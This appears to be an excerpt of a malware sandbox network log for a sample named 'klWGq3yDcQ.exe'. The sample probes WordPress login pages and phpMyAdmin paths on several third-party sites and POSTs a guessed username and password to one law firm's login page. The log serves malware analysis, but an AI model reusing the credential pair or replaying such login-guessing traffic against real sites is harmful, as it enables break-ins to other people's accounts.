                                                                                                                                                                                                    2023-11-26 05:59:43 UTC780INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 76 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC589INData Raw: 31 38 65 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 48 69 67 68 20 54 69 64 65 20 49 6e 63 2e 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 72 63 68 69 76 65
                                                                                                                                                                                                    Data Ascii: 18e9<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; High Tide Inc. &#8212; WordPress</title><meta name="robots" content="max-image-preview:large, noindex, noarchive
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1369INData Raw: 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 6c 31 30 6e 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65
                                                                                                                                                                                                    Data Ascii: href="https://hightideinc.com/wp-admin/css/forms.min.css?ver=6.4.1" type="text/css" media="all" /><link rel="stylesheet" id="l10n-css" href="https://hightideinc.com/wp-admin/css/l10n.min.css?ver=6.4.1" type="text/css" media="all" /><link rel="styleshee
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1369INData Raw: 45 6d 61 69 6c 20 41 64 64 72 65 73 73 3c 2f 6c 61 62 65 6c 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 6c 6f 67 22 20 69 64 3d 22 75 73 65 72 5f 6c 6f 67 69 6e 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 22 20 76 61 6c 75 65 20 73 69 7a 65 3d 22 32 30 22 20 61 75 74 6f 63 61 70 69 74 61 6c 69 7a 65 3d 22 6f 66 66 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 75 73 65 72 6e 61 6d 65 22 20 72 65 71 75 69 72 65 64 3d 22 72 65 71 75 69 72 65 64 22 20 2f 3e 0a 3c 2f 70 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 73 65 72 2d 70 61 73 73 2d 77 72 61 70 22 3e 0a 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 75 73 65 72 5f 70 61 73 73 22 3e 50 61 73 73 77 6f 72 64 3c 2f 6c 61 62 65 6c 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d
                                                                                                                                                                                                    Data Ascii: Email Address</label><input type="text" name="log" id="user_login" class="input" value size="20" autocapitalize="off" autocomplete="username" required="required" /></p><div class="user-pass-wrap"><label for="user_pass">Password</label><div class="wp-
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1369INData Raw: 2e 66 6f 63 75 73 28 29 3b 20 64 2e 73 65 6c 65 63 74 28 29 3b 7d 20 63 61 74 63 68 28 20 65 72 20 29 20 7b 7d 7d 2c 20 32 30 30 29 3b 7d 0a 77 70 5f 61 74 74 65 6d 70 74 5f 66 6f 63 75 73 28 29 3b 0a 69 66 20 28 20 74 79 70 65 6f 66 20 77 70 4f 6e 6c 6f 61 64 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 20 29 20 7b 20 77 70 4f 6e 6c 6f 61 64 28 29 20 7d 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 70 20 69 64 3d 22 62 61 63 6b 74 6f 62 6c 6f 67 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 22 3e 26 6c 61 72 72 3b 20 47 6f 20 74 6f 20 48 69 67 68 20 54 69 64 65 20 49 6e 63 2e 3c 2f 61 3e 20 3c 2f 70 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 69 76 61 63 79 2d 70 6f 6c
                                                                                                                                                                                                    Data Ascii: .focus(); d.select();} catch( er ) {}}, 200);}wp_attempt_focus();if ( typeof wpOnload === 'function' ) { wpOnload() }/* ... */</script><p id="backtoblog"><a href="https://hightideinc.com/">&larr; Go to High Tide Inc.</a> </p><div class="privacy-pol
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1369INData Raw: 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 76 65 6e 64 6f 72 2f 77 70 2d 70 6f 6c 79 66 69 6c 6c 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 33 2e 31 35 2e 30 22 20 69 64 3d 22 77 70 2d 70 6f 6c 79 66 69 6c 6c 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 68 6f 6f 6b 73 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 63 36 61 65 63 39 61 38 64 34 65 35 61 35 64 35 34 33 61 31 22 20 69 64 3d 22 77 70 2d 68 6f 6f 6b 73 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a
                                                                                                                                                                                                    Data Ascii: ps://hightideinc.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0" id="wp-polyfill-js"></script><script type="text/javascript" src="https://hightideinc.com/wp-includes/js/dist/hooks.min.js?ver=c6aec9a8d4e5a5d543a1" id="wp-hooks-js"></script>
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC320INData Raw: 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 64 3d 22 75 73 65 72 2d 70 72 6f 66 69 6c 65 2d 6a 73 2d 65 78 74 72 61 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 75 73 65 72 50 72 6f 66 69 6c 65 4c 31 30 6e 20 3d 20 7b 22 75 73 65 72 5f 69 64 22 3a 22 30 22 2c 22 6e 6f 6e 63 65 22 3a 22 30 30 37 63 61 39 30 65 65 30 22 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 6a 73 2f 75 73 65 72 2d 70 72 6f 66 69 6c 65 2e 6d 69
                                                                                                                                                                                                    Data Ascii: s"></script><script type="text/javascript" id="user-profile-js-extra">/* <![CDATA[ */var userProfileL10n = {"user_id":"0","nonce":"007ca90ee0"};/* ... */</script><script type="text/javascript" src="https://hightideinc.com/wp-admin/js/user-profile.mi
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    392192.168.2.44931074.220.219.1894436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC170OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                    Host: himontessori.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC420INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 68 69 6d 6f 6e 74 65 73 73 6f 72 69 2e 63 6f 6d 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 77 2e 6f 72 67 2f 22 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 2c 68 32 63 0d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:43 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://himontessori.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2c
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC7772INData Raw: 32 62 34 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 61 72 74 69 63 6c 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 61 72 74 69 63 6c 65 23 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20
                                                                                                                                                                                                    Data Ascii: 2b47<!doctype html><html lang="en-US" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# article: http://ogp.me/ns/article#"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile"
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC3313INData Raw: 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 20 6d 65 6e 75 2d 69 74 65 6d 2d 33 34 31 32 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 6d 6f 6e 74 65 73 73 6f 72 69 2e 63 6f 6d 2f 61 62 6f 75 74 75 73 2f 22 3e 41 62 6f 75 74 20 48 4d 53 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 73 75 62 2d 6d 65 6e 75 22 3e 0a 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 33 34 31 35 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 33 34 31 35
                                                                                                                                                                                                    Data Ascii: -post_type menu-item-object-page menu-item-has-children menu-item-3412"><a href="https://himontessori.com/aboutus/">About HMS</a><ul class="sub-menu"><li id="menu-item-3415" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3415
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC8192INData Raw: 33 62 31 30 0d 0a 09 09 09 09 09 0a 09 09 09 09 09 0a 09 09 09 09 3c 2f 6e 61 76 3e 3c 21 2d 2d 20 23 73 69 74 65 2d 6e 61 76 69 67 61 74 69 6f 6e 20 2d 2d 3e 09 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 09 3c 68 65 61 64 65 72 20 69 64 3d 22 6d 61 73 74 68 65 61 64 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 68 65 61 64 65 72 20 62 61 62 79 2d 68 65 61 64 2d 69 6d 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 2d 68 65 61 64 65 72 2d 69 6d 67 22 3e 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 62 79 2d 63 6f 6e 74 61 69 6e 65 72 20 73 69 74 65 2d 62 72 61 6e 64 69 6e 67 20 22 3e 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: 3b10</nav>... #site-navigation --></div></div></div><header id="masthead" class="site-header baby-head-img"> <div class="no-header-img"> <div class="baby-container site-branding ">
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC6934INData Raw: 30 32 31 20 3c 2f 6f 70 74 69 6f 6e 3e 0a 09 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 27 68 74 74 70 73 3a 2f 2f 68 69 6d 6f 6e 74 65 73 73 6f 72 69 2e 63 6f 6d 2f 32 30 32 31 2f 30 34 2f 27 3e 20 41 70 72 69 6c 20 32 30 32 31 20 3c 2f 6f 70 74 69 6f 6e 3e 0a 09 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 27 68 74 74 70 73 3a 2f 2f 68 69 6d 6f 6e 74 65 73 73 6f 72 69 2e 63 6f 6d 2f 32 30 32 31 2f 30 33 2f 27 3e 20 4d 61 72 63 68 20 32 30 32 31 20 3c 2f 6f 70 74 69 6f 6e 3e 0a 09 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 27 68 74 74 70 73 3a 2f 2f 68 69 6d 6f 6e 74 65 73 73 6f 72 69 2e 63 6f 6d 2f 32 30 32 31 2f 30 32 2f 27 3e 20 46 65 62 72 75 61 72 79 20 32 30 32 31 20 3c 2f 6f 70 74 69 6f 6e 3e 0a 09 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 27 68 74 74
                                                                                                                                                                                                    Data Ascii: 021 </option><option value='https://himontessori.com/2021/04/'> April 2021 </option><option value='https://himontessori.com/2021/03/'> March 2021 </option><option value='https://himontessori.com/2021/02/'> February 2021 </option><option value='htt
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC4275INData Raw: 31 30 61 36 0d 0a 0a 09 09 3c 2f 73 65 6c 65 63 74 3e 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 76 61 72 20 64 72 6f 70 64 6f 77 6e 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 20 22 61 72 63 68 69 76 65 73 2d 64 72 6f 70 64 6f 77 6e 2d 2d 31 22 20 29 3b 0a 09 66 75 6e 63 74 69 6f 6e 20 6f 6e 53 65 6c 65 63 74 43 68 61 6e 67 65 28 29 20 7b 0a 09 09 69 66 20 28 20 64 72 6f 70 64 6f 77 6e 2e 6f 70 74 69 6f 6e 73 5b 20 64 72 6f 70 64 6f 77 6e 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 20 5d 2e 76 61 6c 75 65 20 21 3d 3d 20 27 27 20 29 20 7b 0a 09 09 09 64 6f 63 75 6d 65 6e
                                                                                                                                                                                                    Data Ascii: 10a6</select><script type='text/javascript'>/* <![CDATA[ */(function() {var dropdown = document.getElementById( "archives-dropdown--1" );function onSelectChange() {if ( dropdown.options[ dropdown.selectedIndex ].value !== '' ) {documen


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    393192.168.2.44935545.40.150.54443
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC382OUTPOST /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: engel-firm.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=se72ph7k70j2cc32bsjadoqrl1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://engel-firm.com/wp-login.php
                                                                                                                                                                                                    Content-Length: 175
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC175OUTData Raw: 6c 6f 67 3d 63 6f 6e 74 61 63 74 75 73 25 34 30 65 6e 67 65 6c 2d 66 69 72 6d 2e 63 6f 6d 26 70 77 64 3d 57 65 6c 63 6f 6d 65 32 30 31 36 25 32 34 26 77 70 73 65 63 5f 63 61 70 74 63 68 61 5f 61 6e 73 77 65 72 3d 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 65 6e 67 65 6c 2d 66 69 72 6d 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=contactus%40engel-firm.com&pwd=Welcome2016%24&wpsec_captcha_answer=&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Fengel-firm.com%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC773INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 61 67 65 3a 20 30 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 75 70 67 72 61 64 65 2d 69 6e
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Sun, 26 Nov 2023 05:59:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeage: 0cache-control: no-store, no-cache, must-revalidatecontent-security-policy: upgrade-in
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC7940INData Raw: 31 65 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 4c 61 77 20 46 69 72 6d 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73
                                                                                                                                                                                                    Data Ascii: 1efc<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Law Firm &#8212; WordPress</title><meta name='robots' content='noindex, follow' /><script type='text/javas
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1624INData Raw: 36 35 31 0d 0a 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 75 6e 64 65 72 73 63 6f 72 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 31 2e 31 33 2e 34 27 20 69 64 3d 27 75 6e 64 65 72 73 63 6f 72 65 2d 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 69 64 3d 27 77 70 2d 75 74 69 6c 2d 6a 73 2d 65 78 74 72 61 27 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 5f 77 70 55 74 69 6c 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 61 6a 61 78 22 3a 7b 22 75 72 6c 22 3a 22 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 7d 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a
                                                                                                                                                                                                    Data Ascii: 651includes/js/underscore.min.js?ver=1.13.4' id='underscore-js'></script><script type='text/javascript' id='wp-util-js-extra'>/* <![CDATA[ */var _wpUtilSettings = {"ajax":{"url":"\/wp-admin\/admin-ajax.php"}};/* ... */</script><script type='text/j
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    394192.168.2.449479162.210.96.1174436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC184OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: coralparkchristian.org
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC580INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 6a 6a 34 68 31 74 73 6a 31 34 6f 37 68 67 35 63 6f 76 32 66 71 6c 6c
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:43 GMTServer: ApachePragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: PHPSESSID=jj4h1tsj14o7hg5cov2fqll
